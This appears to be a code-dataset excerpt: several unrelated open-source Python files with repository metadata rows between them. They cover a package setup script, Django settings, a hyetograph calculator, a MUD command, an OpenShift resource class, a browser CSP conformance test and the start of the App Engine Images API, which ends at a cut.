"sphinx_rtd_theme",
"sphinxcontrib-plantuml",
"nbsphinx",
# Add all the other optional dependencies to ensure all modules from lisa
# can safely be imported
*itertools.chain.from_iterable(extras_require.values())
]
setup(
name='LISA',
license=license_txt,
version=lisa_version,
author='Arm Ltd',
# TODO: figure out which email to put here
# author_email=
packages=packages,
url='https://github.com/ARM-software/lisa',
project_urls={
"Bug Tracker": "https://github.com/ARM-software/lisa/issues",
"Documentation": "https://lisa-linux-integrated-system-analysis.readthedocs.io/",
"Source Code": "https://github.com/ARM-software/lisa",
},
description='A stick to probe the kernel with',
long_description=long_description,
python_requires='>= 3.6',
install_requires=[
"psutil >= 4.4.2",
# Figure.savefig() (without pyplot) does not work in matplotlib <
# 3.1.0, and that is used for non-interactive plots when building the
# doc.
"matplotlib >= 3.1.0",
# Pandas >= 1.0.0 has support for new nullable dtypes
# Pandas 1.2.0 has broken barplots:
# https://github.com/pandas-dev/pandas/issues/38947
"pandas >= 1.0.0",
"numpy",
"scipy",
# Earlier versions have broken __slots__ deserialization
"ruamel.yaml >= 0.16.6",
# For the HTML output of analysis plots
"docutils",
# For pandas.to_parquet() dataframe storage
"pyarrow",
"ipython",
"ipywidgets",
"mplcursors",
        # Dependencies that are shipped as part of the LISA repo as
# subtree/submodule
"devlib",
],
extras_require=extras_require,
package_data=package_data,
classifiers=[
"Programming Language :: Python :: 3 :: Only",
# This is not a standard classifier, as there is nothing defined for
# Apache 2.0 yet:
# https://pypi.org/classifiers/
"License :: OSI Approved :: Apache Software License 2.0 (Apache-2.0)",
# It has not been tested under any other OS
"Operating System :: POSIX :: Linux",
"Topic :: System :: Operating System Kernels :: Linux",
"Topic :: Software Development :: Testing",
"Intended Audience :: Developers",
],
)
# vim :set tabstop=4 shiftwidth=4 textwidth=80 expandtab
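# Minimal install sketch (run from the repository root; the extras names come from
# the `extras_require` mapping defined above, e.g. "notebook", "test", "doc"):
#
#   pip install .                 # core dependencies only
#   pip install ".[notebook]"     # core plus the Jupyter-based tooling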
| 29.932331
| 89
| 0.642301
|
e4a9be5224cea88db68cb6008068a5c6ccb0cfaa
| 789
|
py
|
Python
|
django_deployer/paas_templates/gondor/settings_gondor.py
|
natea/django-deployer
|
5ce7d972db2f8500ec53ad89e7eb312d3360d074
|
[
"MIT"
] | 19
|
2015-02-06T06:14:39.000Z
|
2021-01-06T22:27:03.000Z
|
django_deployer/paas_templates/gondor/settings_gondor.py
|
natea/django-deployer
|
5ce7d972db2f8500ec53ad89e7eb312d3360d074
|
[
"MIT"
] | null | null | null |
django_deployer/paas_templates/gondor/settings_gondor.py
|
natea/django-deployer
|
5ce7d972db2f8500ec53ad89e7eb312d3360d074
|
[
"MIT"
] | 2
|
2015-12-22T17:22:15.000Z
|
2016-03-02T12:15:01.000Z
|
import os
import dj_database_url
from .settings import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
"default": dj_database_url.config(env="GONDOR_DATABASE_URL"),
}
MEDIA_ROOT = os.path.join(os.environ["GONDOR_DATA_DIR"], "site_media", "media")
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"simple": {
"format": "%(levelname)s %(message)s"
},
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "simple"
}
},
"loggers": {
"": {
"handlers": ["console"],
"level": "INFO",
},
"django.request": {
"propagate": True,
},
}
}
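# Minimal sketch of the environment this settings module expects (hypothetical
# values; GONDOR_DATABASE_URL and GONDOR_DATA_DIR are provided by the Gondor
# platform at runtime and parsed by dj_database_url / os.environ above):
#
#   GONDOR_DATABASE_URL=postgres://user:pass@host:5432/dbname
#   GONDOR_DATA_DIR=/gondor/data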
| 19.725
| 79
| 0.505703
|
aa2904d64fbb70236f86bd6597f6aef941bef118
| 4,278
|
py
|
Python
|
idf_to_hyetograph.py
|
yuriishizawa/idf_to_hyetograph
|
833040cf08dd9aee676c9aaaf454711322446f36
|
[
"MIT"
] | null | null | null |
idf_to_hyetograph.py
|
yuriishizawa/idf_to_hyetograph
|
833040cf08dd9aee676c9aaaf454711322446f36
|
[
"MIT"
] | null | null | null |
idf_to_hyetograph.py
|
yuriishizawa/idf_to_hyetograph
|
833040cf08dd9aee676c9aaaf454711322446f36
|
[
"MIT"
] | null | null | null |
"""
Created by Yuri Ishizawa
e-mail: yuriishizawa@gmail.com
2021
"""
import csv
import matplotlib.pyplot as plt
import pandas as pd
class idf_to_hyetograph:
def __init__(self, K, a, b, c, T, td, dt):
self.K, self.a, self.b, self.c, self.T, self.td, self.dt = K, a, b, c, T, td, dt
if td%dt == 0 and td >= dt:
print("Módulo iniciado")
elif td%dt != 0 and td >= dt:
print("ATENÇÃO: O passo de tempo (dt) deve ser um divisor do tempo de duração (td) da chuva")
else:
print("ATENÇÃO: O passo de tempo (dt) deve ser menor que o tempo de duração (td) da chuva")
def idf(self,t):
intensity = ((self.K*(self.T**self.a))/((t + self.b)**self.c))
return intensity
def calc_dP_t(self):
intensity = []
P = []
dP = []
self.dP_t = []
for i,j in enumerate(list(range(self.dt,self.td+1,self.dt))):
intensity.append(self.idf(j))
P.append(intensity[i]*j/60)
if j == self.dt:
dP.append(P[i])
else:
dP.append(P[i] - P[i-1])
self.dP_t.append(dP[i]*60/self.dt)
self.dP_t.sort()
def calc_h(self):
self.calc_dP_t()
self.h = []
        # For an even number of blocks
if len(self.dP_t)%2 == 0:
            # Left side of the hyetograph
for i in list(range(1,len(self.dP_t),2)):
self.h.append(self.dP_t[i])
            # Right side of the hyetograph
for i in list(range(len(self.dP_t)-2,1,-2)):
self.h.append(self.dP_t[i])
self.h.append(self.dP_t[0])
        # For an odd number of blocks
else:
            # Left side of the hyetograph
for i in list(range(0,len(self.dP_t),2)):
self.h.append(self.dP_t[i])
            # Right side of the hyetograph
for i in list(range(len(self.dP_t)-2,0,-2)):
self.h.append(self.dP_t[i])
return self.h
def save_txt(self):
self.calc_h()
        # Write the hyetograph to a txt file
csvfile = str(self.td)+"min_"+str(self.T)+"anos.txt"
with open(csvfile, "w") as output:
writer = csv.writer(output, lineterminator='\n')
for i,val in enumerate(self.h):
writer.writerow([(i+1)*self.dt,val])
print("Arquivo txt salvo no mesmo diretório deste programa")
def export_df(self):
self.calc_h()
h_list = []
for i,val in enumerate(self.h):
h_list.append([(i+1)*self.dt,val])
df = pd.DataFrame(h_list,columns=['dt','intensity'])
return df
def plot_graph(self):
self.calc_h()
y_axis = self.h
x_axis = []
for i in list(range(self.dt,self.td+1,self.dt)):
x_axis.append(i)
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.set_aspect(aspect=1)
plt.bar(x_axis, y_axis, align='center', color="blue", width=self.dt/2)
plt.text((self.td/2)+self.dt, self.dP_t[-2] + self.dt,f'td = {self.td} min, T = {self.T} anos')
plt.title("Distribuição da chuva")
plt.ylabel("Intensidade (mm/h)")
plt.xlabel('Tempo (min)')
plt.xticks(x_axis, rotation = 35)
plt.tick_params(axis = 'x', which = 'major', labelsize = 8)
return fig
def plot_save_graph(self):
self.calc_h()
y_axis = self.h
x_axis = []
for i in list(range(self.dt,self.td+1,self.dt)):
x_axis.append(i)
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.set_aspect(aspect=1)
plt.bar(x_axis, y_axis, align='center', color="blue", width=self.dt/2)
plt.text((self.td/2)+self.dt, self.dP_t[-2] + self.dt,f'td = {self.td} min, T = {self.T} anos')
plt.title("Distribuição da chuva")
plt.ylabel("Intensidade (mm/h)")
plt.xlabel('Tempo (min)')
plt.xticks(x_axis, rotation = 35)
plt.tick_params(axis = 'x', which = 'major', labelsize = 8)
plt.savefig(str(self.td)+"min_"+str(self.T)+"anos")
plt.show()
print("Gráfico do hietograma salvo no mesmo diretório deste programa")
| 33.952381
| 105
| 0.536466
|
85350882785d007299f4136f498487078ac828f1
| 1,893
|
py
|
Python
|
src/commands/nickname.py
|
seisatsu/DennisMUD-ESP32
|
b63d4b914c5e8d0f9714042997c64919b20be842
|
[
"MIT"
] | 19
|
2018-10-02T03:58:46.000Z
|
2021-04-09T13:09:23.000Z
|
commands/nickname.py
|
seisatsu/Dennis
|
8f1892f21beba6b21b4f7b9ba3062296bb1dc4b9
|
[
"MIT"
] | 100
|
2018-09-22T22:54:35.000Z
|
2021-04-16T17:46:34.000Z
|
src/commands/nickname.py
|
seisatsu/DennisMUD-ESP32
|
b63d4b914c5e8d0f9714042997c64919b20be842
|
[
"MIT"
] | 1
|
2022-01-03T02:21:56.000Z
|
2022-01-03T02:21:56.000Z
|
#######################
# Dennis MUD #
# nickname.py #
# Copyright 2018-2020 #
# Michael D. Reiley #
#######################
# **********
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# **********
NAME = "nickname"
CATEGORIES = ["users"]
USAGE = "nickname <username>"
DESCRIPTION = """Lookup the nickname of a user by their <username>.
You can also lookup a user's username by their nickname with the `realname` command.
Ex. `nickname seisatsu`"""
def COMMAND(console, args):
# Perform initial checks.
if not COMMON.check(NAME, console, args, argmin=1):
return False
# Make sure the named user exists.
targetuser = COMMON.check_user(NAME, console, args[0].lower())
if not targetuser:
return False
# Show the user's nickname.
console.msg("{0}: {1}".format(targetuser["name"], targetuser["nick"]))
return True
| 36.403846
| 84
| 0.699419
|
07f83f42e19aea0b4cb81574380f9f98aec136eb
| 236
|
py
|
Python
|
ocp_resources/installplan.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | 9
|
2021-07-05T18:35:55.000Z
|
2021-12-31T03:09:39.000Z
|
ocp_resources/installplan.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | 418
|
2021-07-04T13:12:09.000Z
|
2022-03-30T08:37:45.000Z
|
ocp_resources/installplan.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | 28
|
2021-07-04T12:48:18.000Z
|
2022-02-22T15:19:30.000Z
|
from ocp_resources.resource import NamespacedResource
class InstallPlan(NamespacedResource):
api_group = NamespacedResource.ApiGroup.OPERATORS_COREOS_COM
class Status(NamespacedResource.Status):
COMPLETE = "Complete"
| 26.222222
| 64
| 0.800847
|
6f505d4b3223a2c863981605191cb408e76fa36a
| 319
|
py
|
Python
|
showdata.py
|
Telemin/buddhabrot
|
a7dc257064fc303b11491bc49819b0782139f81b
|
[
"Unlicense"
] | null | null | null |
showdata.py
|
Telemin/buddhabrot
|
a7dc257064fc303b11491bc49819b0782139f81b
|
[
"Unlicense"
] | null | null | null |
showdata.py
|
Telemin/buddhabrot
|
a7dc257064fc303b11491bc49819b0782139f81b
|
[
"Unlicense"
] | 1
|
2019-02-25T23:51:50.000Z
|
2019-02-25T23:51:50.000Z
|
#!/usr/bin/env python3
import sys
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as mc
def main():
data = np.loadtxt(sys.argv[1]) + 1
plt.hist(data.flatten())
plt.show()
plt.pcolor(data, cmap='gray')
plt.show()
return(0)
if __name__ == "__main__":
main()
| 15.95
| 38
| 0.639498
|
e82f1a96bcfb38e8f26dba57a3914d379ac12a42
| 4,176
|
py
|
Python
|
wts/tests/csp/csp_default-src_cross-origin_style.py
|
Acidburn0zzz/web-testing-service
|
1b46978e27a2e04f322d0f05f606ee96716642aa
|
[
"BSD-3-Clause"
] | null | null | null |
wts/tests/csp/csp_default-src_cross-origin_style.py
|
Acidburn0zzz/web-testing-service
|
1b46978e27a2e04f322d0f05f606ee96716642aa
|
[
"BSD-3-Clause"
] | null | null | null |
wts/tests/csp/csp_default-src_cross-origin_style.py
|
Acidburn0zzz/web-testing-service
|
1b46978e27a2e04f322d0f05f606ee96716642aa
|
[
"BSD-3-Clause"
] | null | null | null |
def main(request, response):
import simplejson as json
f = file('config.json')
source = f.read()
s = json.JSONDecoder().decode(source)
url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
url2 = "http://" + s['host'] + ":" + str(s['ports']['http'][0])
_CSP = "default-src " + url1 + ";script-src 'self' 'unsafe-inline'"
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_default-src_cross-origin_style</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#default-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
<script src="../resources/testharness.js"></script>
<script src="../resources/testharnessreport.js"></script>
<link rel="stylesheet" type="text/css" href='""" + url1 + """/tests/csp/support/w3c/canvas-index.css'/>
<link rel="stylesheet" type="text/css" href='""" + url2+ """/tests/csp/support/w3c/a-green.css'/>
<link rel="stylesheet" type="text/css" href="support/blue-100x100.css"/>
<style>
#test-green {
background-color: green;
}
</style>
</head>
<body>
<div id="log"></div>
<div id="test-blue"></div>
<h3>ext-css:""" + url1 + """/tests/csp/support/w3c/canvas-index.css</h3>
<div id="test-ext-a" class="a"></div>
<div id="test-green"></div>
<script>
test(function() {
var div = document.querySelector("h3");
var fix = getComputedStyle(div)["display"];
assert_equals(fix, "inline", "style setted incorrectly");
}, document.title + "_allowed");
test(function() {
var div = document.querySelector("#test-ext-a");
var fix = getComputedStyle(div)["color"];
assert_not_equals(fix, "rgb(0, 128, 0)", "style setted incorrectly");
}, document.title + "_blocked");
test(function() {
var div = document.querySelector("#test-blue");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 0, 255)", "style setted incorrectly");
}, document.title + "_blocked_int");
test(function() {
var div = document.querySelector("#test-green");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 128, 0)", "style setted incorrectly");
}, document.title + "_blocked_inline");
</script>
</body>
</html> """
| 43.957895
| 107
| 0.663314
|
9230a4a58aca6e866f8a29ca06cd77d3f928edfe
| 1,932
|
py
|
Python
|
all_data_norm.py
|
anikaanzum/NetworkDataAnalysis
|
13f008233ccb4e7c16a576a6e068daf9c14510d6
|
[
"MIT"
] | null | null | null |
all_data_norm.py
|
anikaanzum/NetworkDataAnalysis
|
13f008233ccb4e7c16a576a6e068daf9c14510d6
|
[
"MIT"
] | null | null | null |
all_data_norm.py
|
anikaanzum/NetworkDataAnalysis
|
13f008233ccb4e7c16a576a6e068daf9c14510d6
|
[
"MIT"
] | 1
|
2022-03-16T10:15:06.000Z
|
2022-03-16T10:15:06.000Z
|
import sys
import xlrd
import csv
import pandas
import os
import glob
import os.path
def read_csv(filename):
data=[]
with open(filename) as csvfile:
readCSV = csv.reader(csvfile)
for row in readCSV:
data.append(row)
#print(data)
header=data[0]
#print(header)
return header
def get_csv_info(path,Tag):
header=read_csv(path)
pop=[]
area=[]
for i in header:
if(Tag==i):
#print("Found")
with open(path) as f:
reader = csv.DictReader(f, delimiter=',')
for row in reader:
pop.append(row[Tag])
area.append(row['Areaname'])
return area,pop
my_path = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(my_path, "CensusData/CountyData/")
extension = 'csv'
os.chdir(path)
result = [i for i in glob.glob('*.{}'.format(extension))]
file_name='PopulationNormalized2009.csv'
path = os.path.join(path, file_name)
Tag='NormalizedPopulation'
pop_area,pop_arr=get_csv_info(path,Tag)
path = os.path.join(my_path, "CensusData/CountyData/")
file_name='IncomeNormalized2009.csv'
path = os.path.join(path, file_name)
Tag='NormalizedIncome'
income_area,income_arr=get_csv_info(path,Tag)
path = os.path.join(my_path, "CensusData/CountyData/")
file_name='EducationNormalized2009.csv'
path = os.path.join(path, file_name)
Tag='NormalizedEducation'
edu_area,edu_arr=get_csv_info(path,Tag)
data=[['area','pop_norm','income_norm','edu_norm']]
for i in range(len(pop_area)):
incomeTemp=-1
eduTemp=-1
for j in range(len(income_area)):
if(income_area[j]==pop_area[i]):
incomeTemp=income_arr[j]
break
for j in range(len(edu_area)):
if(edu_area[j]==pop_area[i]):
eduTemp=edu_arr[j]
break
if(incomeTemp!=-1 and eduTemp!=-1):
data.append([pop_area[i],pop_arr[i],incomeTemp,eduTemp])
with open('../CountyData/NormalizedData.csv', 'w') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(data)
| 20.125
| 62
| 0.693064
|
818b395b7b55a334449416eeaca5db9b3ca51cb5
| 34,606
|
py
|
Python
|
google/appengine/api/images/__init__.py
|
qsnake/google_appengine
|
6efcc6e4dd38fe2d2c210b57d3444c26b428af1f
|
[
"Apache-2.0"
] | 1
|
2015-10-28T21:28:29.000Z
|
2015-10-28T21:28:29.000Z
|
google/appengine/api/images/__init__.py
|
lann/python-google-appengine
|
2f1fe26e8429f491b034a5417f7c0c8f3a0247ab
|
[
"Apache-2.0"
] | null | null | null |
google/appengine/api/images/__init__.py
|
lann/python-google-appengine
|
2f1fe26e8429f491b034a5417f7c0c8f3a0247ab
|
[
"Apache-2.0"
] | 5
|
2016-05-26T18:35:17.000Z
|
2020-04-15T06:53:24.000Z
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Image manipulation API.
Classes defined in this module:
Image: class used to encapsulate image information and transformations for
that image.
The current manipulations that are available are resize, rotate,
horizontal_flip, vertical_flip, crop and im_feeling_lucky.
It should be noted that each transform can only be called once per image
per execute_transforms() call.
"""
import struct
from google.appengine.api import apiproxy_stub_map
from google.appengine.api.images import images_service_pb
from google.appengine.runtime import apiproxy_errors
JPEG = images_service_pb.OutputSettings.JPEG
PNG = images_service_pb.OutputSettings.PNG
OUTPUT_ENCODING_TYPES = frozenset([JPEG, PNG])
TOP_LEFT = images_service_pb.CompositeImageOptions.TOP_LEFT
TOP_CENTER = images_service_pb.CompositeImageOptions.TOP
TOP_RIGHT = images_service_pb.CompositeImageOptions.TOP_RIGHT
CENTER_LEFT = images_service_pb.CompositeImageOptions.LEFT
CENTER_CENTER = images_service_pb.CompositeImageOptions.CENTER
CENTER_RIGHT = images_service_pb.CompositeImageOptions.RIGHT
BOTTOM_LEFT = images_service_pb.CompositeImageOptions.BOTTOM_LEFT
BOTTOM_CENTER = images_service_pb.CompositeImageOptions.BOTTOM
BOTTOM_RIGHT = images_service_pb.CompositeImageOptions.BOTTOM_RIGHT
ANCHOR_TYPES = frozenset([TOP_LEFT, TOP_CENTER, TOP_RIGHT, CENTER_LEFT,
CENTER_CENTER, CENTER_RIGHT, BOTTOM_LEFT,
BOTTOM_CENTER, BOTTOM_RIGHT])
MAX_TRANSFORMS_PER_REQUEST = 10
MAX_COMPOSITES_PER_REQUEST = 16
class Error(Exception):
"""Base error class for this module."""
class TransformationError(Error):
"""Error while attempting to transform the image."""
class BadRequestError(Error):
"""The parameters given had something wrong with them."""
class NotImageError(Error):
"""The image data given is not recognizable as an image."""
class BadImageError(Error):
"""The image data given is corrupt."""
class LargeImageError(Error):
"""The image data given is too large to process."""
class InvalidBlobKeyError(Error):
"""The provided blob key was invalid."""
class BlobKeyRequiredError(Error):
"""A blobkey is required for this operation."""
class UnsupportedSizeError(Error):
"""Specified size is not supported by requested operation."""
class Image(object):
"""Image object to manipulate."""
def __init__(self, image_data=None, blob_key=None):
"""Constructor.
Args:
image_data: str, image data in string form.
blob_key: str, image data as a blobstore blob key.
Raises:
NotImageError if the given data is empty.
"""
if not image_data and not blob_key:
raise NotImageError("Empty image data.")
if image_data and blob_key:
raise NotImageError("Can only take one image or blob key.")
self._image_data = image_data
self._blob_key = blob_key
self._transforms = []
self._width = None
self._height = None
def _check_transform_limits(self):
"""Ensure some simple limits on the number of transforms allowed.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested for this image
"""
if len(self._transforms) >= MAX_TRANSFORMS_PER_REQUEST:
raise BadRequestError("%d transforms have already been requested on this "
"image." % MAX_TRANSFORMS_PER_REQUEST)
def _update_dimensions(self):
"""Updates the width and height fields of the image.
Raises:
NotImageError if the image data is not an image.
BadImageError if the image data is corrupt.
"""
if not self._image_data:
raise NotImageError("Dimensions unavailable for blob key input")
size = len(self._image_data)
if size >= 6 and self._image_data.startswith("GIF"):
self._update_gif_dimensions()
elif size >= 8 and self._image_data.startswith("\x89PNG\x0D\x0A\x1A\x0A"):
self._update_png_dimensions()
elif size >= 2 and self._image_data.startswith("\xff\xD8"):
self._update_jpeg_dimensions()
elif (size >= 8 and (self._image_data.startswith("II\x2a\x00") or
self._image_data.startswith("MM\x00\x2a"))):
self._update_tiff_dimensions()
elif size >= 2 and self._image_data.startswith("BM"):
self._update_bmp_dimensions()
elif size >= 4 and self._image_data.startswith("\x00\x00\x01\x00"):
self._update_ico_dimensions()
else:
raise NotImageError("Unrecognized image format")
def _update_gif_dimensions(self):
"""Updates the width and height fields of the gif image.
Raises:
BadImageError if the image string is not a valid gif image.
"""
size = len(self._image_data)
if size >= 10:
self._width, self._height = struct.unpack("<HH", self._image_data[6:10])
else:
raise BadImageError("Corrupt GIF format")
def _update_png_dimensions(self):
"""Updates the width and height fields of the png image.
Raises:
BadImageError if the image string is not a valid png image.
"""
size = len(self._image_data)
if size >= 24 and self._image_data[12:16] == "IHDR":
self._width, self._height = struct.unpack(">II", self._image_data[16:24])
else:
raise BadImageError("Corrupt PNG format")
def _update_jpeg_dimensions(self):
"""Updates the width and height fields of the jpeg image.
Raises:
BadImageError if the image string is not a valid jpeg image.
"""
size = len(self._image_data)
offset = 2
while offset < size:
while offset < size and ord(self._image_data[offset]) != 0xFF:
offset += 1
while offset < size and ord(self._image_data[offset]) == 0xFF:
offset += 1
if (offset < size and ord(self._image_data[offset]) & 0xF0 == 0xC0 and
ord(self._image_data[offset]) != 0xC4):
offset += 4
if offset + 4 <= size:
self._height, self._width = struct.unpack(
">HH",
self._image_data[offset:offset + 4])
break
else:
raise BadImageError("Corrupt JPEG format")
elif offset + 3 <= size:
offset += 1
offset += struct.unpack(">H", self._image_data[offset:offset + 2])[0]
else:
raise BadImageError("Corrupt JPEG format")
if self._height is None or self._width is None:
raise BadImageError("Corrupt JPEG format")
def _update_tiff_dimensions(self):
"""Updates the width and height fields of the tiff image.
Raises:
BadImageError if the image string is not a valid tiff image.
"""
size = len(self._image_data)
if self._image_data.startswith("II"):
endianness = "<"
else:
endianness = ">"
ifd_offset = struct.unpack(endianness + "I", self._image_data[4:8])[0]
if ifd_offset + 14 <= size:
ifd_size = struct.unpack(
endianness + "H",
self._image_data[ifd_offset:ifd_offset + 2])[0]
ifd_offset += 2
for unused_i in range(0, ifd_size):
if ifd_offset + 12 <= size:
tag = struct.unpack(
endianness + "H",
self._image_data[ifd_offset:ifd_offset + 2])[0]
if tag == 0x100 or tag == 0x101:
value_type = struct.unpack(
endianness + "H",
self._image_data[ifd_offset + 2:ifd_offset + 4])[0]
if value_type == 3:
format = endianness + "H"
end_offset = ifd_offset + 10
elif value_type == 4:
format = endianness + "I"
end_offset = ifd_offset + 12
else:
format = endianness + "B"
end_offset = ifd_offset + 9
if tag == 0x100:
self._width = struct.unpack(
format,
self._image_data[ifd_offset + 8:end_offset])[0]
if self._height is not None:
break
else:
self._height = struct.unpack(
format,
self._image_data[ifd_offset + 8:end_offset])[0]
if self._width is not None:
break
ifd_offset += 12
else:
raise BadImageError("Corrupt TIFF format")
if self._width is None or self._height is None:
raise BadImageError("Corrupt TIFF format")
def _update_bmp_dimensions(self):
"""Updates the width and height fields of the bmp image.
Raises:
BadImageError if the image string is not a valid bmp image.
"""
size = len(self._image_data)
if size >= 18:
header_length = struct.unpack("<I", self._image_data[14:18])[0]
if ((header_length == 40 or header_length == 108 or
header_length == 124 or header_length == 64) and size >= 26):
self._width, self._height = struct.unpack("<II",
self._image_data[18:26])
elif header_length == 12 and size >= 22:
self._width, self._height = struct.unpack("<HH",
self._image_data[18:22])
else:
raise BadImageError("Corrupt BMP format")
else:
raise BadImageError("Corrupt BMP format")
def _update_ico_dimensions(self):
"""Updates the width and height fields of the ico image.
Raises:
BadImageError if the image string is not a valid ico image.
"""
size = len(self._image_data)
if size >= 8:
self._width, self._height = struct.unpack("<BB", self._image_data[6:8])
if not self._width:
self._width = 256
if not self._height:
self._height = 256
else:
raise BadImageError("Corrupt ICO format")
def resize(self, width=0, height=0):
"""Resize the image maintaining the aspect ratio.
If both width and height are specified, the more restricting of the two
values will be used when resizing the photo. The maximum dimension allowed
for both width and height is 4000 pixels.
Args:
width: int, width (in pixels) to change the image width to.
height: int, height (in pixels) to change the image height to.
Raises:
TypeError when width or height is not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given height or
width or if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested on this image.
"""
if (not isinstance(width, (int, long)) or
not isinstance(height, (int, long))):
raise TypeError("Width and height must be integers.")
if width < 0 or height < 0:
raise BadRequestError("Width and height must be >= 0.")
if not width and not height:
raise BadRequestError("At least one of width or height must be > 0.")
if width > 4000 or height > 4000:
raise BadRequestError("Both width and height must be <= 4000.")
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_width(width)
transform.set_height(height)
self._transforms.append(transform)
def rotate(self, degrees):
"""Rotate an image a given number of degrees clockwise.
Args:
degrees: int, must be a multiple of 90.
Raises:
TypeError when degrees is not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given degrees or
if MAX_TRANSFORMS_PER_REQUEST transforms have already been requested.
"""
if not isinstance(degrees, (int, long)):
raise TypeError("Degrees must be integers.")
if degrees % 90 != 0:
raise BadRequestError("degrees argument must be multiple of 90.")
degrees = degrees % 360
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_rotate(degrees)
self._transforms.append(transform)
def horizontal_flip(self):
"""Flip the image horizontally.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested on the image.
"""
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_horizontal_flip(True)
self._transforms.append(transform)
def vertical_flip(self):
"""Flip the image vertically.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested on the image.
"""
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_vertical_flip(True)
self._transforms.append(transform)
def _validate_crop_arg(self, val, val_name):
"""Validate the given value of a Crop() method argument.
Args:
val: float, value of the argument.
val_name: str, name of the argument.
Raises:
TypeError if the args are not of type 'float'.
BadRequestError when there is something wrong with the given bounding box.
"""
if type(val) != float:
raise TypeError("arg '%s' must be of type 'float'." % val_name)
if not (0 <= val <= 1.0):
raise BadRequestError("arg '%s' must be between 0.0 and 1.0 "
"(inclusive)" % val_name)
def crop(self, left_x, top_y, right_x, bottom_y):
"""Crop the image.
The four arguments are the scaling numbers to describe the bounding box
which will crop the image. The upper left point of the bounding box will
be at (left_x*image_width, top_y*image_height) the lower right point will
be at (right_x*image_width, bottom_y*image_height).
Args:
left_x: float value between 0.0 and 1.0 (inclusive).
top_y: float value between 0.0 and 1.0 (inclusive).
